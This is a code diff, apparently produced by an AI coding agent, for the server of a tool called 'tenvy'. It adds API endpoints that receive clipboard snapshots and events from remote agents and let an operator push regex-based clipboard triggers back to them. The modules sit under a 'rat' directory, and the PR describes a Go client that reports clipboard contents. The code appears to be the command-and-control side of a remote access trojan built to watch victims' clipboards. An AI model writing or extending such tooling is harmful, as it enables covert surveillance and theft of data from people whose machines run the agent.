+                        // eslint-disable-next-line no-console
+                        console.info(`[clipboard] ${describeEvent(agentId, event)}`);
+                        break;
+                case 'command':
+                        // eslint-disable-next-line no-console
+                        console.warn(
+                                `[clipboard] command action requested for ${describeEvent(agentId, event)} – not implemented`
+                        );
+                        break;
+                default:
+                        // eslint-disable-next-line no-console
+                        console.warn(`[clipboard] unsupported action ${actionType} for ${describeEvent(agentId, event)}`);
+                        break;
+        }
+}
+
+export const GET: RequestHandler = ({ params }) => {
+        const id = params.id;
+        if (!id) {
+                throw error(400, 'Missing agent identifier');
+        }
+
+        const events = clipboardManager.listEvents(id);
+        return json({ events });
+};
+
+export const DELETE: RequestHandler = ({ params }) => {
+        const id = params.id;
+        if (!id) {
+                throw error(400, 'Missing agent identifier');
+        }
+
+        clipboardManager.clearEvents(id);
+        return json({ cleared: true });
+};
+
+export const POST: RequestHandler = async ({ params, request }) => {
+        const id = params.id;
+        if (!id) {
+                throw error(400, 'Missing agent identifier');
+        }
+
+        let envelope: ClipboardEventEnvelope;
+        try {
+                envelope = (await request.json()) as ClipboardEventEnvelope;
+        } catch (err) {
+                throw error(400, 'Invalid clipboard event payload');
+        }
+
+        const events = clipboardManager.appendEvents(id, envelope);
+        for (const event of envelope.events ?? []) {
+                handleAction(id, event);
+        }
+
+        return json({ events });
+};

--- a/tenvy-server/src/routes/api/agents/[id]/clipboard/state/+server.ts
+++ b/tenvy-server/src/routes/api/agents/[id]/clipboard/state/+server.ts
@@ -1,0 +1,28 @@
+import { json, error } from '@sveltejs/kit';
+import type { RequestHandler } from './$types';
+import { clipboardManager, ClipboardError } from '$lib/server/rat/clipboard';
+import type { ClipboardStateEnvelope } from '$lib/types/clipboard';
+
+export const POST: RequestHandler = async ({ params, request }) => {
+        const id = params.id;
+        if (!id) {
+                throw error(400, 'Missing agent identifier');
+        }
+
+        let payload: ClipboardStateEnvelope;
+        try {
+                payload = (await request.json()) as ClipboardStateEnvelope;
+        } catch (err) {
+                throw error(400, 'Invalid clipboard snapshot payload');
+        }
+
+        try {
+                const snapshot = clipboardManager.ingestState(id, payload);
+                return json({ accepted: true, sequence: snapshot.sequence });
+        } catch (err) {
+                if (err instanceof ClipboardError) {
+                        throw error(err.status, err.message);
+                }
+                throw error(500, 'Failed to ingest clipboard snapshot');
+        }
+};

--- a/tenvy-server/src/routes/api/agents/[id]/clipboard/triggers/+server.ts
+++ b/tenvy-server/src/routes/api/agents/[id]/clipboard/triggers/+server.ts
@@ -1,0 +1,128 @@
+import { randomUUID } from 'crypto';
+import { json, error } from '@sveltejs/kit';
+import type { RequestHandler } from './$types';
+import { clipboardManager } from '$lib/server/rat/clipboard';
+import { registry, RegistryError } from '$lib/server/rat/store';
+import type {
+        ClipboardCommandPayload,
+        ClipboardFormat,
+        ClipboardTrigger,
+        ClipboardTriggerAction,
+        ClipboardTriggerCondition
+} from '$lib/types/clipboard';
+
+interface TriggerUpdateRequest {
+        triggers: ClipboardTriggerInput[];
+}
+
+interface ClipboardTriggerInput {
+        id?: string;
+        label?: string;
+        description?: string;
+        condition?: Partial<ClipboardTriggerCondition>;
+        action?: Partial<ClipboardTriggerAction>;
+        createdAt?: string;
+        updatedAt?: string;
+        active?: boolean;
+}
+
+const allowedFormats: ClipboardFormat[] = ['text', 'image', 'files', 'html', 'rtf', 'unknown'];
+const allowedActions = new Set<ClipboardTriggerAction['type']>(['notify', 'command']);
+
+function normalizeFormats(input?: ClipboardFormat[]): ClipboardFormat[] | undefined {
+        if (!input) return undefined;
+        const values = input
+                .map((format) => format?.toLowerCase().trim())
+                .filter((value): value is ClipboardFormat => allowedFormats.includes(value as ClipboardFormat));
+        return values.length > 0 ? Array.from(new Set(values)) : undefined;
+}
+
+function normalizeTrigger(input: ClipboardTriggerInput, now: string): ClipboardTrigger {
+        const id = input.id?.trim() || randomUUID();
+        const label = input.label?.trim() || 'Clipboard trigger';
+        const description = input.description?.trim() || undefined;
+
+        const formats = normalizeFormats(input.condition?.formats);
+        const pattern = input.condition?.pattern?.trim() || undefined;
+        const caseSensitive = Boolean(input.condition?.caseSensitive);
+
+        if (pattern) {
+                try {
+                        new RegExp(pattern, caseSensitive ? undefined : 'i');
+                } catch (err) {
+                        throw error(400, `Invalid trigger pattern for ${label}`);
+                }
+        }
+
+        const actionType = input.action?.type ?? 'notify';
+        if (!allowedActions.has(actionType)) {
+                throw error(400, `Unsupported trigger action type: ${actionType}`);
+        }
+
+        const action: ClipboardTriggerAction = {
+                type: actionType,
+                configuration: input.action?.configuration && typeof input.action.configuration === 'object'
+                        ? input.action.configuration
+                        : undefined
+        };
+
+        return {
+                id,
+                label,
+                description,
+                condition: {
+                        formats,
+                        pattern,
+                        caseSensitive
+                },
+                action,
+                active: typeof input.active === 'boolean' ? input.active : true,
+                createdAt: input.createdAt ?? now,
+                updatedAt: now
+        } satisfies ClipboardTrigger;
+}
+
+export const GET: RequestHandler = ({ params }) => {
+        const id = params.id;
+        if (!id) {
+                throw error(400, 'Missing agent identifier');
+        }
+
+        const triggers = clipboardManager.listTriggers(id);
+        return json({ triggers });
+};
+
+export const PUT: RequestHandler = async ({ params, request }) => {
+        const id = params.id;
+        if (!id) {
+                throw error(400, 'Missing agent identifier');
+        }
+
+        let payload: TriggerUpdateRequest;
+        try {
+                payload = (await request.json()) as TriggerUpdateRequest;
+        } catch (err) {
+                throw error(400, 'Invalid trigger payload');
+        }
+
+        if (!payload?.triggers || !Array.isArray(payload.triggers)) {
+                throw error(400, 'Triggers payload must be an array');
+        }
+
+        const now = new Date().toISOString();
+        const normalized = payload.triggers.map((trigger) => normalizeTrigger(trigger, now));
+
+        clipboardManager.setTriggers(id, normalized);
+
+        try {
+                const command: ClipboardCommandPayload = { action: 'sync-triggers', triggers: normalized };
+                registry.queueCommand(id, { name: 'clipboard', payload: command });
+        } catch (err) {
+                if (err instanceof RegistryError) {
+                        throw error(err.status, err.message);
+                }
+                throw error(500, 'Failed to queue trigger synchronization');
+        }
+
+        return json({ triggers: normalized });
+};


### PR DESCRIPTION
## Summary
- define shared clipboard data structures and add clipboard commands to the agent protocol
- implement the Go clipboard manager, client wiring, and HTTP callbacks to push clipboard state and trigger events
- add server-side clipboard manager, REST API endpoints, trigger management, and UI status enhancements for clipboard actions

## Testing
- go test ./... (in `tenvy-client`)
- npm run check (in `tenvy-server`)


------
https://chatgpt.com/codex/tasks/task_e_68e6d5b72560832b82450d422e7c7344